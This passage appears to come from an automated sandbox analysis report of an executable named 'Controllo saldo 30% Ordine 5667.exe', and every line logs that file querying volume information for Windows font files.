                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
